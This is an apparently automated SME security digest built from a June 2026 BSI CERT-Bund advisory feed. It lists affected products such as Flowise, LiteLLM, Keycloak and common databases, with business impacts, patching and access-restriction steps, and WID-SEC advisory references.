The 2026-06-27 BSI CERT-Bund feed shows a dense patch-risk day for SMEs: 153 advisories, with the main business exposure concentrated in public-facing infrastructure, databases, identity systems, developer platforms, AI tooling, and production Linux stacks.

High-Severity SME Action Plan

Flowise

  1. Risk: Flowise contains critical vulnerabilities that may allow remote code execution or information disclosure.
  2. Business Impact: Production Halt, Unauthorized System Access.
  3. Action: 1. Identify all Flowise instances, including test and internal deployments. 2. If internet-facing, remove public access immediately or restrict it by VPN/IP allowlist. 3. Apply vendor fixes as soon as available. 4. Review admin accounts, API keys, workflow credentials, and recent logs for unknown access.
  4. CVE Reference: WID-SEC-2025-0568, WID-SEC-2025-2048, WID-SEC-2025-0569
  5. Source: https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2025-0568

LiteLLM

  1. Risk: LiteLLM has critical and high vulnerabilities that may allow SQL injection, unauthorized access, or code execution with service privileges.
  2. Business Impact: Data Exposure, AI Service Compromise.
  3. Action: 1. Check whether LiteLLM is used in production, staging, or internal AI gateways. 2. Restrict access to trusted networks only. 3. Patch immediately. 4. Rotate API keys and database credentials if exposure cannot be ruled out. 5. Review logs for unusual model requests, admin changes, and database errors.
  4. CVE Reference: WID-SEC-2026-1288, WID-SEC-2026-1319
  5. Source: https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2026-1288

PTC FlexPLM / PTC Windchill

  1. Risk: PTC FlexPLM and PTC Windchill contain a critical remote code execution vulnerability.
  2. Business Impact: Production Halt, Product Data Exposure.
  3. Action: 1. Ask IT whether PTC FlexPLM or Windchill is used for product lifecycle management. 2. If internet-facing, restrict access immediately. 3. Apply the vendor security update. 4. Review administrator accounts and recent file uploads or workflow changes.
  4. CVE Reference: WID-SEC-2026-1991
  5. Source: https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2026-1991

Linux Kernel

  1. Risk: Multiple Linux Kernel advisories may allow denial of service, security bypass, information disclosure, code execution, or unspecified impacts.
  2. Business Impact: Production Halt.
  3. Action: 1. Inventory Linux servers, appliances, virtual machines, and container hosts. 2. Prioritize internet-facing systems and business-critical workloads. 3. Schedule kernel updates with reboot windows. 4. Confirm systems actually rebooted into the patched kernel. 5. Monitor service stability after reboot.
  4. CVE Reference: WID-SEC-2026-2077, WID-SEC-2026-0861, WID-SEC-2026-1802, WID-SEC-2026-1700
  5. Source: https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2026-2077

jq

  1. Risk: jq contains vulnerabilities that may allow denial of service, data manipulation, or other effects in scripts and automation.
  2. Business Impact: Production Halt, Automation Integrity Risk.
  3. Action: 1. Check whether jq is installed on servers, CI/CD runners, backup scripts, or data-processing jobs. 2. Patch through the operating system package manager. 3. Re-run critical automation jobs after patching. 4. Watch for failed scripts or changed JSON-processing output.
  4. CVE Reference: WID-SEC-2026-1469
  5. Source: https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2026-1469

Google Chrome / Microsoft Edge / Mozilla Firefox / Thunderbird

  1. Risk: Browser and mail-client vulnerabilities may allow code execution, sandbox escape, denial of service, or security bypass through malicious web or email content.
  2. Business Impact: Endpoint Compromise, Credential Theft.
  3. Action: 1. Force browser and mail-client updates through device management. 2. Ask users to restart browsers, not only install updates. 3. Prioritize finance, HR, admin, and management devices. 4. Block outdated versions where endpoint management allows it.
  4. CVE Reference: WID-SEC-2026-2071, WID-SEC-2026-2092, WID-SEC-2026-1959
  5. Source: https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2026-2071

Fluentd

  1. Risk: Fluentd vulnerabilities may allow remote code execution, information disclosure, or denial of service in logging pipelines.
  2. Business Impact: Production Halt, Monitoring Blindness.
  3. Action: 1. Identify Fluentd agents and collectors. 2. Restrict ingestion endpoints to trusted networks. 3. Patch Fluentd and related plugins. 4. Confirm logs still arrive after patching. 5. Review whether unknown sources submitted logs.
  4. CVE Reference: WID-SEC-2026-2096
  5. Source: https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2026-2096

Keycloak

  1. Risk: Keycloak vulnerabilities may allow information disclosure, cross-site scripting, security bypass, file manipulation, or misleading displayed information.
  2. Business Impact: Customer Trust Risk, Identity Access Risk.
  3. Action: 1. Identify all Keycloak realms and public login portals. 2. Patch Keycloak. 3. Check login themes, static assets, and admin users for unauthorized changes. 4. Review logs for suspicious admin-console activity. 5. Rotate client secrets if compromise is suspected.
  4. CVE Reference: WID-SEC-2026-2093
  5. Source: https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2026-2093

PowerDNS

  1. Risk: PowerDNS vulnerabilities may affect DNS availability, cache integrity, DNSSEC validation, and confidentiality.
  2. Business Impact: Website and Email Outage.
  3. Action: 1. Confirm whether PowerDNS runs authoritative or recursive DNS. 2. Patch immediately if it serves public or internal business-critical domains. 3. Verify DNSSEC validation and zone integrity. 4. Monitor DNS error rates and unusual cache behavior.
  4. CVE Reference: WID-SEC-2026-2091
  5. Source: https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2026-2091

Coolify

  1. Risk: Coolify vulnerabilities may allow code execution, security bypass, or information disclosure in deployment platforms.
  2. Business Impact: Application Deployment Compromise.
  3. Action: 1. Check whether Coolify manages production apps. 2. Restrict admin access to trusted networks. 3. Patch Coolify. 4. Review deployment logs, environment variables, tokens, and connected Git repositories.
  4. CVE Reference: WID-SEC-2026-2089
  5. Source: https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2026-2089

Google Cloud Platform

  1. Risk: A Google Cloud Platform vulnerability may allow remote code execution.
  2. Business Impact: Cloud Workload Compromise.
  3. Action: 1. Ask your cloud administrator whether affected GCP services are in use. 2. Apply Google-recommended mitigations and updates. 3. Review service accounts, IAM changes, and recent workload activity. 4. Rotate credentials if abnormal access appears.
  4. CVE Reference: WID-SEC-2026-2087
  5. Source: https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2026-2087

WSO2 API Manager

  1. Risk: WSO2 API Manager vulnerabilities may allow security bypass, denial of service, privilege escalation, code execution, SQL injection, or cross-site scripting.
  2. Business Impact: Production Halt, Customer Trust Risk.
  3. Action: 1. Identify public API gateways and admin consoles. 2. Restrict external access where possible. 3. Patch WSO2 API Manager. 4. Review API keys, admin users, gateway logs, and database access logs. 5. Validate that critical APIs still work after patching.
  4. CVE Reference: WID-SEC-2026-2085
  5. Source: https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2026-2085

IBM WebSphere Application Server / Liberty

  1. Risk: IBM WebSphere and Liberty vulnerabilities may allow file manipulation, cross-site scripting, code execution, information disclosure, or denial of service.
  2. Business Impact: Production Halt, Customer Trust Risk.
  3. Action: 1. Identify WebSphere and Liberty applications. 2. Patch according to IBM guidance. 3. Check public web files and deployed applications for unexpected changes. 4. Review access logs for exploitation attempts. 5. Test business-critical workflows after patching.
  4. CVE Reference: WID-SEC-2026-2050
  5. Source: https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2026-2050

MariaDB / Oracle MySQL / PostgreSQL

  1. Risk: Database advisories affect MariaDB, Oracle MySQL, and PostgreSQL, including SQL injection, privilege escalation, code execution, information disclosure, and denial of service.
  2. Business Impact: GDPR Liability, Production Halt.
  3. Action: 1. Inventory all database servers and managed database services. 2. Prioritize systems containing customer, employee, payment, or order data. 3. Patch during a controlled maintenance window. 4. Review database logs for unauthorized exports, new users, privilege changes, and unusual queries. 5. Involve the Data Protection Officer if unauthorized access cannot be excluded.
  4. CVE Reference: WID-SEC-2026-1744, WID-SEC-2026-1199, WID-SEC-2025-0372, WID-SEC-2024-3475, WID-SEC-2024-1800, WID-SEC-2024-0335, WID-SEC-2023-2873, WID-SEC-2026-0409, WID-SEC-2026-1544, WID-SEC-2025-1842
  5. Source: https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2025-0372

Node.js / Golang Go / Netty / libssh2 / vim

  1. Risk: Core developer and runtime components contain vulnerabilities that may allow code execution, denial of service, memory corruption, data manipulation, information disclosure, or security bypass.
  2. Business Impact: Software Supply Chain Risk, Production Halt.
  3. Action: 1. Ask development and IT teams to identify affected runtime versions in production, CI/CD, and containers. 2. Patch base images and build environments. 3. Rebuild and redeploy affected applications. 4. Confirm no outdated runtime remains in containers or long-lived servers.
  4. CVE Reference: WID-SEC-2026-2004, WID-SEC-2026-1006, WID-SEC-2026-1996, WID-SEC-2026-1814, WID-SEC-2026-0940, WID-SEC-2026-1776, WID-SEC-2026-0548, WID-SEC-2026-0345, WID-SEC-2025-2227
  5. Source: https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2026-2004

Atlassian Products

  1. Risk: Atlassian Bamboo, Bitbucket, Confluence, Fisheye, Crucible, Jira, and Jira Service Management contain vulnerabilities affecting code execution, privilege escalation, security bypass, data manipulation, and information disclosure.
  2. Business Impact: Project Data Exposure, Internal Workflow Disruption.
  3. Action: 1. Identify all Atlassian products and public access paths. 2. Patch internet-facing Confluence, Jira, and Bitbucket first. 3. Review admin accounts, installed apps, access tokens, and recent permission changes. 4. Back up before patching and verify integrations afterward.
  4. CVE Reference: WID-SEC-2026-1955
  5. Source: https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2026-1955

Red Hat Enterprise Linux / OpenShift / Service Mesh

  1. Risk: Red Hat advisories affect Enterprise Linux components, OpenShift Service Mesh, urllib3, openEXR, openCryptoki, hplip, and 389-ds-base, with possible denial of service, information disclosure, privilege escalation, and code execution.
  2. Business Impact: Production Halt, Platform Compromise.
  3. Action: 1. Check Red Hat systems, OpenShift clusters, and container base images. 2. Apply vendor errata through standard patch tooling. 3. Rebuild affected containers. 4. Restart dependent services. 5. Confirm cluster health and application readiness after updates.
  4. CVE Reference: WID-SEC-2026-1957, WID-SEC-2026-1934, WID-SEC-2026-0207, WID-SEC-2026-1440
  5. Source: https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2026-1957

Docker / Aqua Security Trivy / vLLM

  1. Risk: Container and AI infrastructure tools contain vulnerabilities that may allow security bypass, file manipulation, denial of service, or code execution.
  2. Business Impact: Build Pipeline Compromise, AI Service Disruption.
  3. Action: 1. Inventory Docker hosts, Trivy scanners, and vLLM deployments. 2. Patch host packages and container images. 3. Rebuild CI/CD runners and AI-serving images. 4. Review build logs, scan outputs, mounted volumes, and service credentials.
  4. CVE Reference: WID-SEC-2026-0873, WID-SEC-2026-1924, WID-SEC-2026-1974, WID-SEC-2026-0287, WID-SEC-2026-0190
  5. Source: https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2026-0873

cPanel / NGINX / Apache Tomcat / Rsync

  1. Risk: Hosting and web-serving components contain vulnerabilities that may allow denial of service, code execution, information disclosure, data manipulation, or security bypass.
  2. Business Impact: Website Outage, Customer Trust Risk.
  3. Action: 1. Identify hosting panels, reverse proxies, web servers, and file-sync services. 2. Patch cPanel/WHM, NGINX, Tomcat, and Rsync. 3. Restrict admin panels and sync services from public access. 4. Review web logs, upload directories, and configuration changes. 5. Verify websites and APIs after patching.
  4. CVE Reference: WID-SEC-2026-1880, WID-SEC-2026-0860, WID-SEC-2026-0443, WID-SEC-2026-1661, WID-SEC-2026-1611, WID-SEC-2026-1527
  5. Source: https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2026-0860

IBM App Connect Enterprise Certified Container

  1. Risk: IBM App Connect Enterprise Certified Container contains vulnerabilities that may allow code execution, information disclosure, denial of service, or cross-site scripting.
  2. Business Impact: Integration Platform Disruption.
  3. Action: 1. Identify App Connect container deployments. 2. Pull patched container images. 3. Redeploy affected integration workloads. 4. Review exposed endpoints, credentials, and message-flow logs.
  4. CVE Reference: WID-SEC-2026-1434
  5. Source: https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2026-1434

Other Operational Risks

The remaining 94 lower-severity advisories still matter operationally because they often become the backlog attackers rely on: medium findings in browsers, developer libraries, servers, and infrastructure tools can combine with weak passwords, exposed admin panels, stale containers, or missing monitoring. Treat the medium and low items as a 30-day hygiene queue: assign owners, confirm product exposure, patch routinely, and document exceptions. No individual CVE list was provided for the lower-severity aggregate in this feed extract; use the BSI advisory pages as the working reference when matching products to your inventory.

Key Vulnerabilities Tracker

Table 1: Key Vulnerabilities Tracker

Severity Affected Vendor/Product CVE Reference Business Impact
Kritisch Flowise WID-SEC-2025-0568, WID-SEC-2025-2048, WID-SEC-2025-0569 Production Halt, Unauthorized System Access
Kritisch LiteLLM WID-SEC-2026-1288 Data Exposure, AI Service Compromise
Kritisch PTC FlexPLM / Windchill WID-SEC-2026-1991 Product Data Exposure
Hoch Linux Kernel WID-SEC-2026-2077, WID-SEC-2026-0861, WID-SEC-2026-1802, WID-SEC-2026-1700 Production Halt
Hoch Keycloak WID-SEC-2026-2093 Customer Trust Risk, Identity Access Risk
Hoch WSO2 API Manager WID-SEC-2026-2085 Production Halt, Customer Trust Risk
Hoch PostgreSQL WID-SEC-2025-0372, WID-SEC-2026-1544 GDPR Liability, Production Halt
Hoch MariaDB / Oracle MySQL WID-SEC-2026-1744, WID-SEC-2026-1199 Data Integrity and Availability Risk
Hoch Google Chrome / Microsoft Edge / Firefox / Thunderbird WID-SEC-2026-2071, WID-SEC-2026-2092, WID-SEC-2026-1959 Endpoint Compromise
Hoch Fluentd WID-SEC-2026-2096 Monitoring Blindness
Hoch PowerDNS WID-SEC-2026-2091 Website and Email Outage
Hoch Coolify WID-SEC-2026-2089 Deployment Platform Compromise
Hoch Google Cloud Platform WID-SEC-2026-2087 Cloud Workload Compromise
Hoch IBM WebSphere / Liberty WID-SEC-2026-2050 Production Halt, Customer Trust Risk
Hoch Node.js / Go / Netty / libssh2 / vim WID-SEC-2026-2004, WID-SEC-2026-1006, WID-SEC-2026-1996, WID-SEC-2026-1814, WID-SEC-2026-0940 Software Supply Chain Risk
Hoch Atlassian Products WID-SEC-2026-1955 Project Data Exposure
Hoch Red Hat Enterprise Linux / OpenShift WID-SEC-2026-1957, WID-SEC-2026-1934, WID-SEC-2026-0207 Platform Compromise, Production Halt
Hoch Docker / Trivy / vLLM WID-SEC-2026-0873, WID-SEC-2026-1924, WID-SEC-2026-0190 Build Pipeline and AI Service Risk
Hoch cPanel / NGINX / Tomcat / Rsync WID-SEC-2026-1880, WID-SEC-2026-0860, WID-SEC-2026-0443, WID-SEC-2026-1611 Website Outage, Customer Trust Risk
Hoch IBM App Connect Enterprise Certified Container WID-SEC-2026-1434 Integration Platform Disruption

Patterns I noticed

The strongest pattern is not one single vendor. It is concentration around systems that keep SMEs running: identity, databases, web front ends, cloud services, developer runtimes, and container platforms.

AI tooling also appears repeatedly through Flowise, LiteLLM, and vLLM. If these tools were adopted quickly for internal automation, they should now be treated like production systems: patched, access-controlled, logged, and owned by a named operator.

  • G-HOST (Mittelstand Threat Digest Engine)